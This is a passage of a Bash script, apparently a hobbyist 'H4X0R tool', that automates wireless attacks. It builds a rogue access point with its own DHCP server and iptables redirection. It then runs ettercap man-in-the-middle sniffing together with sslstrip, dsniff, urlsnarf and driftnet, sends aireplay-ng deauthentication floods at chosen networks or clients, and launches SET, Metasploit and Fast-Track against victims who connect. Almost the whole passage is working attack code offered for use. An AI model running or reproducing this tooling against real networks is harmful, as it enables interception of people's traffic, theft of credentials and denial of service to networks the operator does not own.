  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080;
elif [ "$DO" == "attack" ];then
  iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP";
else 
  echo "******************************************************************";
  echo "Enter 'sniff' or 'attack' only!!!";
  exit 0
fi
echo "******************************************************************";
echo "Setting up the DHCP server and running it";
echo "******************************************************************";
echo "ddns-update-style none;" > /etc/dhcp3/dhcpd.conf
echo "authoritative;" >> /etc/dhcp3/dhcpd.conf
echo "default-lease-time 600;" >> /etc/dhcp3/dhcpd.conf
echo "max-lease-time 7200;" >> /etc/dhcp3/dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /etc/dhcp3/dhcpd.conf
echo "option routers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
echo "option subnet-mask 255.255.255.0;" >> /etc/dhcp3/dhcpd.conf
echo "option broadcast-address 10.0.0.255;" >> /etc/dhcp3/dhcpd.conf
echo "option domain-name-servers "$GW";" >> /etc/dhcp3/dhcpd.conf
echo "range 10.0.0.10 10.0.0.20;" >> /etc/dhcp3/dhcpd.conf
echo "}" >> /etc/dhcp3/dhcpd.conf;
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd;
echo > /var/lib/dhcp3/dhcpd.leases;
xterm -hold -bg black -fg blue -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &
echo "Launching DHCP entries log";
xterm -bg black -fg blue -T "DHCP log" -e tail -f /var/log/messages &>/dev/null &
}

#Cleans up processes made by this script
function cleanup(){
  clear;
  echo 0 > /proc/sys/net/ipv4/ip_forward;
  killall -q arpspoof dhcpd3 airbase-ng aireplay-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null &
  iptables --flush;
  iptables --table nat --flush;
  iptables --delete-chain;
  iptables --table nat --delete-chain;
  airmon-ng stop "$MIFACE";
  airmon-ng stop "$WIFACE";
  ifconfig "$WIFACE" down;
  ifconfig "$WIFACE" up;
  echo > /etc/dhcp3/dhcpd.conf;
  echo > /var/lib/dhcp3/dhcpd.leases;
  firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
}

#Sets up the sniffing methods and calls the Rogue AP function automatically
function sniffap(){
clear;
echo "******************************************************************";
echo "Checking to see if your ready to run ettercap...";
echo "******************************************************************";
  if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then
    sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    echo "Uncommented your iptables in /etc/etter.conf for you :)";
  fi
iptables -t nat -A PREROUTING -p udp -j DNAT --to "$GW";
mirror;
read -p "Press ENTER to start ettercap after you have someone connected to "$AP""
xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 /"$GW"/ // &>/dev/null &
#sudo ettercap -G &>/dev/null &
sleep 7;
echo "******************************************************************";
echo "If ettercap is now sniffing then startup some other fun tools";
echo "******************************************************************";
  showMenu () {
 echo
 echo "1) sslstrip"
 echo "2) driftnet"
 echo "3) urlsnarf"
 echo "4) dsniff"
 echo "5) Add your own tool"
 echo "6) Deauth victim"
 echo "7) Stop sniffing and start attacking"
 echo "8) Exit and cleanup"
 echo "9) Exit and leave everything running"
 echo
}
while [ 1 ]
do
 showMenu
 read CHOICE
 case "$CHOICE" in
 "1")
   echo "Setting up sslstrip";
   xterm -bg black -fg blue -T "sslstrip" -e sslstrip -a -k -f -l 8080 &>/dev/null &
   sleep 1;
   xterm -bg black -fg blue -T "sslstrip log" -e tail -f sslstrip.log &>/dev/null &
  ;;
 "2")
   echo "Setting up driftnet";
   xterm -bg black -fg blue -T "driftnet" -e driftnet -v -i at0 &>/dev/null & 
  ;;
 "3")
   echo "Setting up urlsnarf";
   xterm -bg black -fg blue -T "urlsnarf" -e urlsnarf -i at0 &>/dev/null & 
  ;;
 "4")
   echo "Setting up dsniff";
   xterm -bg black -fg blue -T "dsniff" -e dsniff -m -i at0 -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null &  
  ;;
 "5")
   echo "******************************************************************";
   echo "What other sniffing tools are you planning to use? Email me slippery@shellium.org";
   xterm -bg black -fg blue &>/dev/null &
   echo "******************************************************************";
  ;;
 "6")
   deauth;
  ;;
 "7")
   attackap;
  ;;
 "8")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   cleanup;
   exit 0
  ;;
 "9")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
   exit 0
  ;;
 esac
done
}

#Sets up the deauth method for your Rogue Ap
function deauth(){
echo "******************************************************************";
xterm -hold -bg black -fg blue -T "airodump-ng" -e airodump-ng "$MIFACE" &>/dev/null &
echo "You should see a new window, let it run for 10 seconds.....";
sleep 10;
echo "You should now see some activity";
echo "******************************************************************";
echo "Enter the MAC of the network you wish to deauth";
read APMAC;
echo "Using "$APMAC" as the network to deauth";
echo "******************************************************************";
echo "Enter the channel of the network you wish to deauth";
read CHAN;
echo "Using channel "$CHAN""
echo "******************************************************************";
echo "Do you want to deauth all clients or just 1 client? (all or one)";
read OA;
echo "******************************************************************";
echo "Enter the number of deauth packets to send, (5-10 normally) Note: 0 means to send them continuously";
read DP;
echo "******************************************************************";
if [ "$OA" == "all" ];then
  echo "Deauthing all clients on "$APMAC" with "$DP" Packets";
  xterm -hold -bg black -fg blue -T "aireplay-ng" -e aireplay-ng --deauth "$DP" -a "$APMAC" "$MIFACE" &>/dev/null &
elif [ "$OA" == "one" ];then
  killall -q airodump-ng;
  xterm -hold -bg black -fg blue -T "airodump-ng" -e airodump-ng -c "$CHAN" --bssid "$APMAC" -w airodump$(date +%F-%H%M).log "$MIFACE" &>/dev/null &
  echo "Enter the Client's MAC address connected to "$APMAC"";
  echo "******************************************************************";
  read CMAC;
  echo "******************************************************************";
  echo "Deauthing "$CMAC" on "$APMAC" with "$DP" Packets";
  echo "******************************************************************";
  xterm -hold -bg black -fg blue -T "aireplay-ng" -e aireplay-ng --deauth "$DP" -a "$APMAC" -c "$CMAC" "$MIFACE" &>/dev/null &
else 
  echo "******************************************************************";
  echo "Enter 'all or 'one' only!!!";
  exit 0
fi
}

#Sets up the attack methods for your Rogue AP
function attackap(){
clear;
echo "******************************************************************";
echo "You have choosen to attack, Select some tools to start attacking, then launch your Rogue AP";
echo "******************************************************************";
  showMenu () {
 echo
 echo "1) SimpleHTTPServer port 80"
 echo "2) Social Engineering Toolkit"
 echo "3) Metasploit"
 echo "4) Fast-Track"
 echo "5) Add your own tool"
 echo "6) Launch your Rogue AP"
 echo "7) Deauth victim"
 echo "8) Exit and cleanup"
 echo "9) Exit and leave everything running"
 echo 
}
while [ 1 ]
do
 showMenu
 read CHOICE
 case "$CHOICE" in
 "1")
   echo "Setting up SimpleHTTPServer on port 80 in "$PWD"";
   xterm -bg black -fg blue -T "SimpleHTTPServer" -e python -m SimpleHTTPServer 80 &>/dev/null &
   sleep 3;
  ;;
 "2")
   echo "Setting up Social Engineering Toolkit";
   cd /pentest/exploits/SET && xterm -bg black -fg blue -T "Social Engineering Toolkit" -e ./set &>/dev/null &
   sleep 10;
  ;;
 "3")
   echo "Setting up Metasploit.........";
   cd /pentest/exploits/framework3 && xterm -bg black -fg blue -T "Metasploit" -e ./msfconsole &>/dev/null &
   sleep 2;
   echo "Few more seconds......";
   sleep 15;
  ;;
 "4")
   echo "Setting up Fast-Track";
   cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -T "Fast-Track" -e ./fast-track.py -i &>/dev/null &
   sleep 10; 
  ;;
 "5")
   echo "******************************************************************";
   echo "What other attacks are you planning? Email me slippery@shellium.org";
   xterm -bg black -fg blue &>/dev/null &
   echo "******************************************************************";
  ;;
 "6")
   mirror;
  ;;
 "7")
   deauth;
  ;;
 "8")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   cleanup;
   exit 0
  ;;
 "9")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
   exit 0
  ;;
 esac
done
}

# Defines if you want to sniff or attack the Rogue AP
function qrogueap(){
clear;
echo "Do you want to sniff or attack "$AP"? (sniff or attack)";
read DO;
if [ "$DO" == "sniff" ];then
  sniffap;
elif [ "$DO" == "attack" ];then
  attackap;
else 
  echo "******************************************************************";
  echo "Enter 'sniff' or 'attack' only!!!";
  exit 0
fi
}

#Start Menu
showMenu () {
test "$(whoami)" != 'root' && (echo YOU MUST RUN THIS AS ROOT; exit 0)
 echo
 echo "*******Please select a choice below*******"
 echo "1) H4X0R a network your already connected to"
 echo "2) Create a Rogue Ap and H4X0R it"
 echo "3) Crack WEP"
 echo "4) Need Help?"
 echo "5) Update Tools"
 echo 
}
while [ 1 ]
do
 showMenu
 read CHOICE
 case "$CHOICE" in
 "1")
   subnetscript;  
  ;;
 "2")
   rogueapscript;
  ;;
 "3")
#Have only 1 tool uncommented below (use the apt-get line only to install wifite witch is my favorite tool btw...)#
# apt-get update && apt-get install wifite #
   wepcrack;
   #grimwepa &
   #sh -c "python wifite.py; sudo -s" &
  ;;
 "4")
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
  ;;
 "5")
   echo "Updating tools......"
   cd /pentest/wireless/aircrack-ng/; svn up;
   cd /pentest/exploits/framework3/; svn up;
   cd /pentest/exploits/SET/; ./set-update;
   cd /pentest/exploits/fasttrack/; svn up;
   cd /pentest/wireless/wifite/; python wifite.py -upgrade;
  ;;
 esac
done